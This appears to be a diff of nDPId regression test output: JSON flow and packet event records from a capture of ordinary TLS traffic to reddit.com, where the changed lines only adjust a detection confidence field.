{"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -58,20 +58,20 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -82,9 +82,9 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} 